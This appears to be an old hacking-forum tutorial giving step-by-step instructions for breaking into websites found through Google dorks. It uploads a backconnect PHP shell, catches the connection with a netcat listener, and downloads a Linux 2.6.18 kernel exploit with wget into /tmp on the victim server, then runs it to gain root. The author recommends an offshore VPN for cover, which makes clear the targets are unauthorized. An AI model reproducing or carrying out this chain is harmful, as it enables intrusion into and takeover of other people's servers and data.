Root Exploit for Linux based server

Root Exploit for Linux based server

• Requirements:
• -netcat 
• -a decent shell to backconnect to your own machine
• -little knowledge of linux 
• - offshore vpn / Or some protection
• - Brain 

Step 1: 

Goto google and use your favorite dork to find out some decent site logins.

eg: inurl:login.asp or admin.asp or admin.php etc

i'll be using inurl:admin.asp

 It should look somethin like this:

http://img149.imageshack.us/img149/5169/googledork.png

Step 2:

Use SQLi or RFi or LFi or any other method you want to gain access to the site's login.

sometimes even the basic SQLi is enough for u to gain access to the site and upload the shell :D

 i would not be going into detail as to how to gain access to admin login as this tuto mainly focusses to show how easy it is to find and run an exploit to become root

(maybe somtime in near future when i have a lott of time i'll explain the methods to upload the shell as its going to take a lott of time to explain .. )

oK i found my site... found the admin login and knw what.. i evn found an option to upload a page using the admin login .. ( yea yea .. I'm damn lucky )

Step 3:

 Now that i have the upload option in front of me .. i'll be uploading a shell through which i'll backconnect to my machine.

You may use a C99 or R57 or anyother shell for that matter which gives u ability to backconnect.

Using it you can easily do the thing whichh mosstt people think is the best thing you can do after uploadin a shell --> DEFACE ... :P .. but am not intrested in that.. kk .. will continue with the next step :P ...

I'll be using a basic shell coZ only support we need is to back connect to our machine.

This is the shell ( not created my me .. found it a long time bck and have been using it since .. thanx for the person who creatd it  )

http://pastebin.com/10gQ4nrx

Step 4

Now, before you remote connect to your local machine, if you are behind a router, you need to have a open port on your local machine to accpt the connectn from the site to your machine.

portforwarding is quite easy ... you may go through portforwarding.com to do the settings according to the router...

eg : http://portforward.com/english/routers/port_forwarding/Dlink/WBR-2310/Echolink.htm

or better just google portforwarding  you'll get all the info u need. :P ( coZ i could not find the settings for my router over ther n had to google it :D )

 in my case it looks like this:

i just logged in my router.... then went on to activate DMZ and then went to virtual server and setup "1234" as my open port to point to my machines private ip.

And voila it was done.

http://img249.imageshack.us/img249/765/91656338.png

Step 5:

now tht u have a open port on your machine... all you need to do it , setup netcat in listening mode using cmd syntax as >> nc -n -l -p 1234 -vv

btw if u dont know ... you can download netcat from : http://www.downloadnetcat.com/

http://img405.imageshack.us/img405/3135/71458387.png

Step 6:

find out http://www.xxxxxx.com/YYY/shell.php or whereever the location of the shell is...if u find difficulty locating the shell... U may also use acunetix if u want to find it ;) ... as it gives you a complete directory view

of

the site and tht scan help you find the uploaded shell location.

Then open the site: http://www.xxxxxx.com/YYY/shell.php

http://img576.imageshack.us/img576/2968/76958792.png

Go back to your netcat ... it would look smthin like this:

http://img716.imageshack.us/img716/8062/14645639.png

ok ok ... the uid is not root as of now... damnn :'( :P .. ok ok ... vll get ther in some time.

Step 7: from the above step you now know tht the linux version is 2.6.18

now you can either goto exploit-db.com and search for 2.6.18 .. or can directly google .. 2.6.18 exploit

http://securityfocus.com/data/vulnerabilities/exploits/2009-linux-sendpage3.tar.gz

so what i do it ..goto the /tmp folder and then type : wget -q securityfocus.com/data/vulnerabilities/exploits/2009-linux-sendpage3.tar.gz on the linux window.

then i unwrap the file using tar -zxvf 2009*

i'll get something like this :

http://img607.imageshack.us/img607/4299/78280850.png

Step 8 :

now cd into the downloaded exploit folder ..

will look somethin like this

http://img263.imageshack.us/img263/1746/87602659.png

step 9:

 now we will run this exploit using :

./run

is should look something like:

http://img573.imageshack.us/img573/4823/69468462.png

Step 10:

 Now the final step --- type in :id to see who you are :D ...

it should look something like this...

http://img232.imageshack.us/img232/7946/82077713.png

n Voilaa Your root

and you all knw what all you can do when you are root ;) ... You're The king :)

hope this was helpful to aleast some of you ...

Lemme know whether u liked it or not...

written by : Meta1Wrath  aka Th3 R0oter


Note : there are Some error below Post ... igNore it ... and if anyone of you can fix it then contact me on minhalmehdi2000@gmail.com